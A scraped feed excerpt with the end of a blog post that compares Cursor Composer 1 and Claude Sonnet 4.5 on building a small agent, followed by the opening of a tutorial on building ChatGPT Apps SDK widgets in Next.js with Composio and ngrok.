&lt;p&gt;In terms of code quality and implementation, there’s not much difference. That said, Sonnet 4.5 burned almost twice the tokens, while Composer 1 delivered similar results in half the time (not 4x) with far fewer tokens. It’s efficient, fast, and feels like a strong pick for everyday coding.&lt;/p&gt;




&lt;h2&gt;
  
  
  Brief on Cursor Composer
&lt;/h2&gt;

&lt;p&gt;Since this model dropped only a few weeks ago, here’s a short refresher.&lt;/p&gt;

&lt;p&gt;Composer 1 is the first agent-focused coding model from Cursor. They claim it’s about &lt;strong&gt;4x faster&lt;/strong&gt; than similarly intelligent models.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuu0qynnm51uftisq70i5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuu0qynnm51uftisq70i5.png" alt="Cursor Composer 1 Bench Score"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;(By the way, what even is the &lt;strong&gt;Cursor Bench Score&lt;/strong&gt;? Can't really trust all the metrics blindly. 🤷‍♂️)&lt;/p&gt;

&lt;p&gt;It is said to be a mixture-of-experts (MoE) language model supporting long-context generation and understanding. As mentioned earlier, it was built through reinforcement learning (RL) especially with agent building and general software engineering workflows in mind.&lt;/p&gt;

&lt;p&gt;They've positioned it as a frontier coding model whose speed sets it apart from peer models of similar intelligence. It comes with a &lt;strong&gt;250 tokens per second&lt;/strong&gt; output speed, roughly twice as fast as most coding models and about 4–5 times faster than some reasoning models.&lt;/p&gt;

&lt;p&gt;As for pricing, it matches GPT-5: &lt;strong&gt;$1.25&lt;/strong&gt; per million input tokens and &lt;strong&gt;$10&lt;/strong&gt; per million output tokens, which is pretty affordable for what it promises.&lt;/p&gt;
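&lt;p&gt;To make those rates concrete, here's a quick back-of-the-envelope calculation. The token counts below are made-up illustration values, not numbers from a real Composer 1 run:&lt;/p&gt;

```python
# Rough cost of a single run at Composer 1's quoted rates:
# $1.25 per 1M input tokens, $10 per 1M output tokens.
INPUT_PRICE_PER_M = 1.25
OUTPUT_PRICE_PER_M = 10.0

def run_cost(input_tokens: int, output_tokens: int) -> float:
    """Return the USD cost of one model call."""
    return (
        input_tokens / 1_000_000 * INPUT_PRICE_PER_M
        + output_tokens / 1_000_000 * OUTPUT_PRICE_PER_M
    )

# Hypothetical agent build: 200K input tokens, 30K output tokens.
print(f"cost: ${run_cost(200_000, 30_000):.2f}")  # → cost: $0.55

# At the claimed 250 tokens/sec, 30K output tokens take:
print(f"generation: {30_000 / 250:.0f}s")  # → generation: 120s
```

&lt;p&gt;As the second line shows, at these output speeds the raw generation time stops being the bottleneck; tool calls and your own review take longer.&lt;/p&gt;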

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frz366g4szwoolkousg0f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frz366g4szwoolkousg0f.png" alt="Cursor Composer 1 pricing with other models table"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It is clearly aimed at replacing models like GPT-5 and Claude Sonnet 4.5 for software development. Although it is said that these models beat Composer 1 in pure coding intelligence, they run much slower.&lt;/p&gt;

&lt;p&gt;So, we can say that Composer comes with a bit of an accuracy trade-off for a &lt;strong&gt;lot&lt;/strong&gt; of speed gain, which could be a great option for some but not for everyone.&lt;/p&gt;

&lt;p&gt;But all of these claims come from Cursor's own benchmark. It's up to you whether you decide to trust it or not. 🤷‍♂️&lt;/p&gt;




&lt;h2&gt;
  
  
  Coding Comparison
&lt;/h2&gt;

&lt;p&gt;Alright, enough talk. Let’s see how Composer 1 stacks up against Sonnet 4.5 in actual coding.&lt;/p&gt;

&lt;p&gt;Since Composer is pitched as an “agentic” model, I wanted to see how well it could handle building an AI agent from scratch.&lt;/p&gt;

&lt;p&gt;To build the agent, we will be using Composio's &lt;a href="https://docs.composio.dev/docs/tool-router/quick-start" rel="noopener noreferrer"&gt;Tool Router (Beta)&lt;/a&gt;, which automatically discovers, authenticates, and executes the right tool for any task without you having to manage authentication and wire everything per integration. 🔥&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡&lt;strong&gt;Fun Fact:&lt;/strong&gt; Tool Router is what powers complex agentic products like &lt;a href="https://rube.app" rel="noopener noreferrer"&gt;Rube&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
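&lt;p&gt;To make the flow concrete, here's a minimal sketch of the agent loop we're asking the models to build. The &lt;code&gt;ToolRouterSession&lt;/code&gt; class below is a stand-in I made up, not Composio's actual API; check the Tool Router quick-start for the real calls:&lt;/p&gt;

```python
from dataclasses import dataclass, field

@dataclass
class ToolRouterSession:
    """Placeholder for a Tool Router session, which would discover,
    authenticate, and execute the right tool for each task."""
    executed: list = field(default_factory=list)

    def execute(self, task: str) -> str:
        # A real session would route the task to a concrete tool
        # (e.g. a tweet-posting action) and run it; here we just record it.
        self.executed.append(task)
        return f"done: {task}"

def run_agent(youtube_url: str, session: ToolRouterSession) -> list:
    """Mirror the plan: fetch transcript, pick highlights, post a thread,
    with each step delegated to the router."""
    steps = [
        f"fetch transcript for {youtube_url}",
        "summarize the most interesting parts",
        "post the summary as a Twitter thread",
    ]
    return [session.execute(step) for step in steps]

results = run_agent("https://youtube.com/watch?v=abc123", ToolRouterSession())
print(results[-1])  # done: post the summary as a Twitter thread
```

&lt;p&gt;The real session handles auth and tool selection on its own; that's exactly the boilerplate the Tool Router is meant to remove.&lt;/p&gt;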

&lt;p&gt;We’ll compare code quality, token usage, cost, and time to complete the build.&lt;/p&gt;

&lt;h3&gt;
  
  
  What's the plan?
&lt;/h3&gt;

&lt;p&gt;I asked both models to build a small Python agent that takes a YouTube URL, finds the interesting parts of the video, and posts a Twitter thread on behalf of the user.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;💁 Prompt:&lt;/strong&gt; "Create an AI Agent in Python when given a YouTube URL, The agent will find the interesting part of the video and post a tweeter thread on behalf of the user. For this, use the Composio's Tool Router: &lt;a href="https://docs.composio.dev/docs/tool-router/quick-start" rel="noopener noreferrer"&gt;https://docs.composio.dev/docs/tool-router/quick-start&lt;/a&gt;. Note: Don’t use Composio’s YouTube Integration, build a custom tool on your own using the YouTube Transcript API (to make things a little harder)."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Response from Composer 1
&lt;/h3&gt;

&lt;p&gt;You can find the entire source code here: &lt;a href="https://gist.github.com/shricodev/aada89ce44f833a62fd41368d770b4c7" rel="noopener noreferrer"&gt;Composer 1 AI Agent with Tool Router&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/zoJu535wWBY"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;Composer was really fast with the response. It took a little over 3 minutes to produce the first version, though it ran into a small issue implementing the YouTube transcript function and adding it as a custom tool to the agent.&lt;/p&gt;

&lt;p&gt;It also misused a few types and functions from the modules, but nothing too severe.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fji49qtpg717o90yvnh7q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fji49qtpg717o90yvnh7q.png" alt="Cursor Composer 1 agent with code errors"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;But after a bit of back and forth over two more prompts, with a little help from my side, it got everything working.&lt;/p&gt;

&lt;p&gt;On the Composio side, working with the Tool Router, it didn't really run into any problems.&lt;/p&gt;

&lt;p&gt;Token usage was around &lt;strong&gt;200K&lt;/strong&gt; tokens. As for timing, the first response took roughly 3 minutes, and the follow-ups were negligible.&lt;/p&gt;

&lt;p&gt;It wasn't asked to, but it did quite a good job with the code quality and the overall user interface of the CLI chat.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 One thing I found a bit irritating is the number of comments it writes; there's a comment for every single line, which is insane! For many, it could be great, but this definitely feels a bit too much.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Response from Sonnet 4.5
&lt;/h3&gt;

&lt;p&gt;You can find the entire source code here: &lt;a href="https://gist.github.com/shricodev/30b9218148df4bc35080336824f85b5e" rel="noopener noreferrer"&gt;Claude Sonnet 4.5 AI Agent with Tool Router&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the output of the program:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/4BJKeZfCe1M"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;Sonnet kinda disappointed me here. The code quality was fine, yet it repeatedly used the old YouTube Transcript API methods (&lt;code&gt;get_transcript&lt;/code&gt;, &lt;code&gt;list_transcripts&lt;/code&gt;) even after being shown the newer version.&lt;/p&gt;

&lt;p&gt;I eventually had to fix that part myself. And for some reason, whenever I asked for a small change, Sonnet rewrote half the working code, which felt unnecessary and ate up tokens like crazy.&lt;/p&gt;
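&lt;p&gt;For reference, this is roughly the API change Sonnet kept tripping over, assuming &lt;code&gt;youtube-transcript-api&lt;/code&gt; v1.x; treat the exact calls as a sketch and verify them against the library's docs:&lt;/p&gt;

```python
def fetch_transcript_text(video_id: str) -> str:
    """Fetch a transcript with the v1.x instance-based API.

    Pre-1.0 code used the static `YouTubeTranscriptApi.get_transcript(...)`
    and `list_transcripts(...)` methods; v1.x replaces them with an
    instance plus `fetch(...)` / `list(...)`. Requires
    `pip install youtube-transcript-api` and network access, so the
    function is defined here but not called.
    """
    from youtube_transcript_api import YouTubeTranscriptApi

    snippets = YouTubeTranscriptApi().fetch(video_id)
    return " ".join(snippet.text for snippet in snippets)
```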

&lt;p&gt;Its total token usage was nearly double Composer's, around &lt;strong&gt;427K tokens&lt;/strong&gt;, and it took about 10 minutes to finish the job.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuwy2rg9jnv8q6rzgqlmx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuwy2rg9jnv8q6rzgqlmx.png" alt="Claude 4.5 Sonnet cost to build the agent"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To be fair, its implementation of the Tool Router itself was solid but quite a bit slower and heavier overall.&lt;/p&gt;

&lt;h3&gt;
  
  
  Summary
&lt;/h3&gt;

&lt;p&gt;To summarize the results: I couldn't find much difference in code quality or implementation; both models read the Tool Router documentation and implemented it well. But it was noticeably harder to get Sonnet to use the new API instead of the one it was trained on.&lt;/p&gt;

&lt;p&gt;Token usage and completion time are just &lt;strong&gt;not comparable&lt;/strong&gt;. Claude used 427K tokens, &lt;strong&gt;2.1 times&lt;/strong&gt; Composer 1's roughly 200K. The time gap was just as significant, and I also had to do many more follow-ups than with Composer.&lt;/p&gt;




&lt;h2&gt;
  
  
  Wrap Up!
&lt;/h2&gt;

&lt;p&gt;This was a really quick test. You could ask for more features in the agent and compare both models further, but I'll leave that to you. Even from this small run, though, Composer 1 stands out. ⚡&lt;/p&gt;

&lt;p&gt;In less than half the time and with far fewer tokens, it matched or even slightly outperformed Sonnet 4.5 in overall coding quality.&lt;/p&gt;

&lt;p&gt;From my experience using it, I don’t think you’ll run into any major issues choosing Composer over Sonnet for everyday development. It’s fast, consistent, and honestly feels built for this exact kind of work.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7nd4aur01c4dnzebxvtj.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7nd4aur01c4dnzebxvtj.gif" alt="Thumbs up GIF"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Would love to hear if anyone else has benchmarked this model with cool real world projects. ✌️&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>programming</category>
      <category>ai</category>
      <category>javascript</category>
    </item>
    <item>
      <title>💡How to Build ChatGPT Apps with Widgets using the ChatGPT Apps SDK and Next.js 🥶⚡</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Mon, 03 Nov 2025 15:35:43 +0000</pubDate>
      <link>https://forem.com/composiodev/how-to-build-chatgpt-apps-with-widgets-using-the-chatgpt-apps-sdk-and-nextjs-104i</link>
      <guid>https://forem.com/composiodev/how-to-build-chatgpt-apps-with-widgets-using-the-chatgpt-apps-sdk-and-nextjs-104i</guid>
      <description>&lt;p&gt;With the recent release of ChatGPT apps, especially the ChatGPT Apps SDK, developers can now build apps that run directly inside ChatGPT. 🤯&lt;/p&gt;

&lt;p&gt;Currently, by default, OpenAI supports just the following apps: Booking.com, Canva, Coursera, Expedia, Figma, Spotify, and Zillow.&lt;/p&gt;

&lt;p&gt;They plan to support developer-built apps by opening submissions later this year. This is a big moment for everyone who uses ChatGPT, especially developers who can build their own apps, and for the over 800 million ChatGPT users who get to try them.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm6e93pq6n7tp5gaildyc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm6e93pq6n7tp5gaildyc.png" alt="OpenAI statement on supporting developers app inside ChatGPT"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So it's worth learning how to build your own apps with the ChatGPT Apps SDK. How cool would it be to create an app that connects to over 500 other apps and isn't limited to the default OpenAI-supported ones?&lt;/p&gt;

&lt;p&gt;That's precisely what we'll cover, from understanding the SDK and running the project locally to temporarily hosting it on Ngrok to access it in ChatGPT.&lt;/p&gt;

&lt;p&gt;So, without further ado, let's dive right in.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyuw9en0w9o0cxkg6kwo8.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyuw9en0w9o0cxkg6kwo8.gif" alt="Furious Kid Screaming"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;To quickly summarize what we'll cover in this blog post, here's what we'll go through:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;What are ChatGPT apps and the Apps SDK?&lt;/li&gt;
&lt;li&gt;Installing Ngrok to host your localhost project on the internet with one command.&lt;/li&gt;
&lt;li&gt;How to use Rube to access OpenAI ChatGPT Apps.&lt;/li&gt;
&lt;li&gt;How to implement widgets in Next.js with ChatGPT Apps SDK + Rube MCP.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you work with Next.js and want to learn how to build custom widgets for your ChatGPT Apps, this is the right place to start.&lt;/p&gt;




&lt;h2&gt;
  
  
  What is ChatGPT Apps and the Apps SDK
&lt;/h2&gt;

&lt;p&gt;ChatGPT Apps are third-party tools that you can run directly in your ChatGPT conversations. The best way to understand this is to think of it as a way to use these apps like Figma, Canva, Zillow, Spotify, and more, and do all sorts of work directly in them without ever leaving ChatGPT.&lt;/p&gt;

&lt;p&gt;To give you a better overview, these are some things you can do with ChatGPT Apps:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Say "Spotify, create me a playlist for my study session," and it'll build you a nice playlist in Spotify and play it directly in your chat.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;Say "Canva, create me a thumbnail for my blog post with this text," and it'll build you a nice thumbnail for your blog post.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You're seeing where this is headed. This is OpenAI's third attempt to make ChatGPT not just a chatbot, but an all-in-one platform with all apps directly available in it, so you never have to leave ChatGPT.&lt;/p&gt;

&lt;p&gt;The first two attempts, like custom GPTs, didn't catch on with users. This approach, however, is more powerful and flexible, and if it's adopted, ChatGPT really could become your all-in-one platform.&lt;/p&gt;

&lt;p&gt;Well, then what's &lt;strong&gt;ChatGPT Apps SDK?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;As the name suggests, it's pretty obvious; it's used to build apps that run inside ChatGPT. 🫠&lt;/p&gt;

&lt;p&gt;To add more context, it's an open-source toolkit from OpenAI built on top of MCP that lets developers create apps that run directly in ChatGPT.&lt;/p&gt;

&lt;p&gt;At a high level, this is how it works:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your app (e.g., Canva, Figma, etc.) runs as an MCP server that exposes its tools and input/output schemas directly to ChatGPT.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;Now, ChatGPT can invoke those tools and, optionally, render the UI components you provide in a sandbox.&lt;/li&gt;
&lt;/ul&gt;
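&lt;p&gt;In Python terms, that first step boils down to something like this sketch using the official MCP Python SDK's &lt;code&gt;FastMCP&lt;/code&gt;. The &lt;code&gt;get_meeting&lt;/code&gt; tool and its fields are made up for illustration, and the import is deferred so the snippet parses without the package installed:&lt;/p&gt;

```python
def build_server():
    """Minimal MCP server exposing one tool with a typed schema.

    Assumes `pip install mcp`; the tool name and returned fields are
    illustrative, not part of any real app.
    """
    from mcp.server.fastmcp import FastMCP

    mcp = FastMCP("calendar-demo")

    @mcp.tool()
    def get_meeting(meeting_id: str) -> dict:
        # ChatGPT can call this tool and optionally render the result
        # in a widget your app provides.
        return {"id": meeting_id, "title": "Standup", "time": "09:00"}

    return mcp

# build_server().run() would serve the tool so any MCP client,
# ChatGPT included, can discover and invoke `get_meeting`.
```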




&lt;h2&gt;
  
  
  Building a ChatGPT App in Next.js with Widgets
&lt;/h2&gt;

&lt;p&gt;The source code mainly consists of basic React code, so I won't explain it from scratch here. It's a GPT app designed to display Google Calendar meeting details with widget support.&lt;/p&gt;

&lt;p&gt;This should be a good starting point for you. Feel free to build something similar for your use case with any apps you prefer.&lt;/p&gt;

&lt;p&gt;Begin by cloning the project repository using the command below:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/shricodev/chatgpt-apps-sdk-demo-composio.git
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
Step 1: Set Up Composio
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ We'll use Composio to add integrations support to our application. You can choose any integration you like. &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Before moving forward, you need to obtain a &lt;a href="https://platform.composio.dev/" rel="noopener noreferrer"&gt;Composio API key&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Go ahead and create an account on Composio, get your API key, and paste it into the &lt;code&gt;.env&lt;/code&gt; file in the root of the project.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffh6aay8ta2jd3phbmcnu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffh6aay8ta2jd3phbmcnu.png" alt="Composio Dashboard"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="py"&gt;COMPOSIO_API_KEY&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;lt;YOUR_COMPOSIO_API_KEY&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;For this demo, I'll be using Google Calendar, so head over to the Composio dashboard to access the auth config ID for Google Calendar.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Create the auth config for Google Calendar.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyx8kyeo65y0jdk2ih0zb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyx8kyeo65y0jdk2ih0zb.png" alt="Composio Google Calendar Auth Config"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Note the external user ID, as we will use it in the &lt;code&gt;.env&lt;/code&gt; file.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Once done, copy the auth config ID (which starts with &lt;code&gt;ac_&lt;/code&gt;). Now, add the auth config ID and the user ID to the &lt;code&gt;.env&lt;/code&gt; file.&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="py"&gt;COMPOSIO_USER_ID&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;lt;YOUR_COMPOSIO_USER_ID&amp;gt;&lt;/span&gt;
&lt;span class="py"&gt;CALENDAR_AUTH_CONFIG_ID&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;lt;YOUR_COMPOSIO_CALENDAR_AUTH_CONFIG_ID&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Your final &lt;code&gt;.env&lt;/code&gt; file should look something like this:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="py"&gt;COMPOSIO_API_KEY&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;lt;YOUR_COMPOSIO_API_KEY&amp;gt;&lt;/span&gt;
&lt;span class="py"&gt;COMPOSIO_USER_ID&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;lt;YOUR_COMPOSIO_USER_ID&amp;gt;&lt;/span&gt;

&lt;span class="py"&gt;CALENDAR_AUTH_CONFIG_ID&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;lt;YOUR_COMPOSIO_CALENDAR_AUTH_CONFIG_ID&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  Install Dependencies and Start the Project
&lt;/h3&gt;

&lt;p&gt;Once your environment variables are configured, install the project dependencies:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pnpm &lt;span class="nb"&gt;install&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;After installation is complete, start the project with:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pnpm run dev
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;By default, the app runs on port &lt;code&gt;3000&lt;/code&gt;. Double-check that it’s running on that port, as you’ll need this information later when setting up Ngrok.&lt;/p&gt;
&lt;h3&gt;
  
  
Step 2: Expose Your App with Ngrok
&lt;/h3&gt;

&lt;p&gt;Since ChatGPT isn't running locally on your machine, you can't use &lt;code&gt;localhost:3000&lt;/code&gt; when connecting to the app in ChatGPT.&lt;/p&gt;

&lt;p&gt;You can host it on platforms like Vercel, but Ngrok is often faster and more convenient for development.&lt;/p&gt;

&lt;p&gt;Ngrok lets you share your local project via a temporary public URL, which is perfect for quick testing without redeploying.&lt;/p&gt;

&lt;p&gt;Even if you need to make changes, you won't have to push the changes to your repo to trigger the Vercel deployment. Ngrok can work directly from your local filesystem.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Install Ngrok&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Make sure that you have &lt;a href="https://ngrok.com/" rel="noopener noreferrer"&gt;Ngrok&lt;/a&gt; installed on your machine.&lt;/p&gt;

&lt;p&gt;Visit this URL: &lt;a href="https://ngrok.com/" rel="noopener noreferrer"&gt;Ngrok Installation Guide&lt;/a&gt;, and find the relevant steps for your machine.&lt;/p&gt;

&lt;p&gt;If you're someone like me who prefers Docker, you can use the following command to pull the Ngrok public image from Docker Hub.&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker pull ngrok/ngrok
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Use whichever installation method fits your workflow.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Start Ngrok&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Make sure that the project is running locally and listening on port 3000, as we will be exposing it to the internet.&lt;/p&gt;

&lt;p&gt;It's as simple as typing out this command:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ngrok http 3000 // Change to the port your app is running on
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;And if you've followed the Docker steps, run the following command:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;--net&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;host &lt;span class="nt"&gt;-it&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;NGROK_AUTHTOKEN&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&amp;lt;NGROK_AUTH_TOKEN&amp;gt; ngrok/ngrok:latest http 3000 // Change to the port your app is running on
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;This will give you a public URL to access the project. Keep a note of this as we'll need it when setting up ChatGPT to add our new app.&lt;/p&gt;

&lt;p&gt;Make sure to replace &lt;code&gt;&amp;lt;NGROK_AUTH_TOKEN&amp;gt;&lt;/code&gt; with your actual ngrok auth token.&lt;/p&gt;

&lt;p&gt;You can find it in your Ngrok dashboard. Log in to your &lt;a href="https://dashboard.ngrok.com/" rel="noopener noreferrer"&gt;Ngrok&lt;/a&gt; account, and you'll find it in the dashboard.&lt;/p&gt;
&lt;h3&gt;
  
  
  Step 3: Connect Your App to ChatGPT
&lt;/h3&gt;

&lt;p&gt;Now, you should have a public URL for your app. Let's add it to ChatGPT.&lt;/p&gt;

&lt;p&gt;It should look something like this: &lt;a href="https://topographical-unmagnifying-halle.ngrok-free.dev/" rel="noopener noreferrer"&gt;&lt;code&gt;https://topographical-unmagnifying-halle.ngrok-free.dev&lt;/code&gt;&lt;/a&gt;&lt;/p&gt;

